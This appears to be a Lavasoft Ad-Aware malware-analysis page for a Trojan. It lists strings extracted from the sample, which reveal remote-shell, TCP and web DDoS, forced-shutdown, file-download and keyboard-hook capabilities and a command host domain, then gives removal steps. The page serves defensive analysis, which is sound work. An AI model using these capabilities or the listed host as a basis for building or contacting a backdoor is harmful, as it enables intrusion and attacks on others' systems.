CallerInfoCopyCmd
SetIPPort
GetIPPort
"C:\Windows\System32\ESPI11.dll"
ProviderInstallCopyCmd
SockDataCopyCmd
SockAddrCopyCmd
enetintercept_fnSockAddrSetIPPort
enetintercept_fnSockAddrGetIPPort
enetintercept_fnInstallCopyCmd
enetintercept_fnSockDataCopyCmd
enetintercept_fnSockAddrCopyCmd
enetintercept_fnCallerInfoCopyCmd
%s,%d
%s.lnk
(*.htm;*.html)|*.htm;*.html
its:%s::%s
(*.avi)|*.avi
WPFT532.CNV
WPFT632.CNV
EXCEL32.CNV
write32.wpc
Windows Write
mswrd632.wpc
Word for Windows 6.0
wword5.cnv
Word for Windows 5.0
mswrd832.cnv
mswrd632.cnv
Word 6.0/95 for Windows & Macintosh
html32.cnv
;3 #>6.&
'2, / 0&7!4-)1#
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
.PAVCOleException@@
.PAVCResourceException@@
.PAVCUserException@@
.PAVCOleDispatchException@@
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
7Dispatch methods do not support more than 64 parameters&Cannot change the size of a JPEG image
JPEG error #%d
No help keyword specified.
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object
(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Alt  Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Thread creation error: %s
Thread Error: %s (%d)*Windows socket error: %s (%d), on API '%s'
Asynchronous socket error %d
Unsupported clipboard format
List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to create key %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s'
Ancestor for '%s' not found
Cannot assign a %s to a %s
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation
1, 0, 6, 6
- Skin.dll
1, 1, 0, 0
ESPI11.dll
1.2.7.0
(*.*)
2.6.0.0

%original file name%.exe_348_rwx_0D6D0000_0003F000:

`.rsrc
L$(h%f
SSh0j
msctls_hotkey32
TVCLHotKey
THotKey
\skinh.she
}uo,x6l5k%x-l h
9p%s m)t4`#b
e"m?c&y1`Ð<
SetViewportOrgEx
SetViewportExtEx
SetWindowsHookExA
UnhookWindowsHookEx
EnumThreadWindows
EnumChildWindows
`c%US.4/
!#$<#$#=
.text
`.rdata
@.data
.rsrc
@.UPX0
`.UPX1
`.reloc
hJK.ZH
O.qt0
KERNEL32.DLL
COMCTL32.dll
GDI32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
USER32.dll
SkinH_EL.dll
1, 0, 6, 6
- Skin.dll

svchost.exe_2672:

.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
MAPI32.DLL
OnKeyDown
OnKeyPress
OnKeyUp
THintActionD%C
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
Password
OnExecute
svchost.exe
778691.dowei8.com
127.0.0.1
%Program Files%\ie8\
Windows
iexplore.exe
ole32.dll
SourcePort
DestPort
UnitTCPIP
TCPIPORT
TCPIPORT4
ws2_32.dll
iphlpapi.dll
1.2.3
<?xml version="1.0" encoding="UNICODE"?><tree2xml app="SVCHOST.exe">
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_CONFIG
(The key is too long to be read.)
HKEY_DYN_DATA
Microsoft\Network\Connections\pbk\rasphone.pbk
rasapi32.dll
rnaph.dll
cmd /c "
%dMB,
" WindowsPath="
" ExeShortName="
" ExeFileName="
\Software\Microsoft\Windows\CurrentVersion\uninstall
\software\microsoft\windows\currentversion\uninstall\
TRemoteShellCmdU
TtcpDDOSThread
TwebDDOSThread
HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE 3.01)
hXXp://
advapi32.dll
cmd /c shutdown -s -f -t 0
cmd /c shutdown -r -f -t 0
Down.exe
Set objws=WScript.CreateObject("wscript.shell")
objws.Run kavpath,,true
ctfmon.exe
Move.exe
Port
UDPSockError
TMYNMUDP
MYNMUDP
RemotePort<
LocalPort<
ReportLevelL
0.0.0.0
%d.%d.%d.%d
FilterGraph %p pid %x
D:\dat_aq\DSPACK234\src\DSPack\DSUtil.pas
($%x).
vpDoNotRenderColorKeyAndBorder
Operation
TOnDVDCMD
CmdID
OnDVDCMDStartx0I
OnDVDCMDEndL[A
OnDVDWarningFormatNotSupportedL[A
D:\dat_aq\DSPACK234\src\DSPack\DSPack.pas
FormKeyDown
Msxml2.XMLHTTP
\Program Files\Internet Explorer\iexplore.exe
ntdll.dll
Kernel32.dll
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
192.168.11.130
user32.dll
GetKeyboardType
RegOpenKeyExA
RegCloseKey
ReportEventA
RegQueryInfoKeyA
RegFlushKey
RegEnumKeyExA
RegDeleteKeyA
RegCreateKeyExA
RegCreateKeyA
WinExec
GetWindowsDirectoryA
GetCPInfo
CreatePipe
mpr.dll
version.dll
gdi32.dll
SetViewportOrgEx
keybd_event
UnhookWindowsHookEx
SetWindowsHookExA
SetProcessWindowStation
OpenWindowStationA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetProcessWindowStation
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
GetAsyncKeyState
EnumWindows
EnumThreadWindows
CloseWindowStation
ActivateKeyboardLayout
shell32.dll
ShellExecuteExA
ShellExecuteA
SHFileOperationA
wininet.dll
InternetOpenUrlA
URLMON.DLL
URLDownloadToFileA
wsock32.dll
avicap32.dll
imagehlp.dll
winmm.dll
ADVAPI32.DLL
DeleteUrlCacheEntry
quartz.dll
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
(*),,,0001
!!! ###%%$
n.2.Ýdddddddd
KWindows
UrlMon
.ScktComp
IMYNMUDP
CMDUnit
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
VMROptions.Mode
MediaType.data
BaseFilter.data
<requestedExecutionLevel level="requireAdministrator"/>
7Dispatch methods do not support more than 64 parameters&Cannot change the size of a JPEG image
JPEG error #%d
No help keyword specified.
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object
(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Alt  Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Thread creation error: %s
Thread Error: %s (%d)*Windows socket error: %s (%d), on API '%s'
Asynchronous socket error %d
Unsupported clipboard format
List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to create key %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s'
Ancestor for '%s' not found
Cannot assign a %s to a %s
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IFK30NOL\dlldy[1].htm (60 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IFK30NOL\gengxin[1].htm (232 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
    C:\svchost.exe (3797 bytes)
    C:\Proxy.dll (151 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@xie6[1].txt (203 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now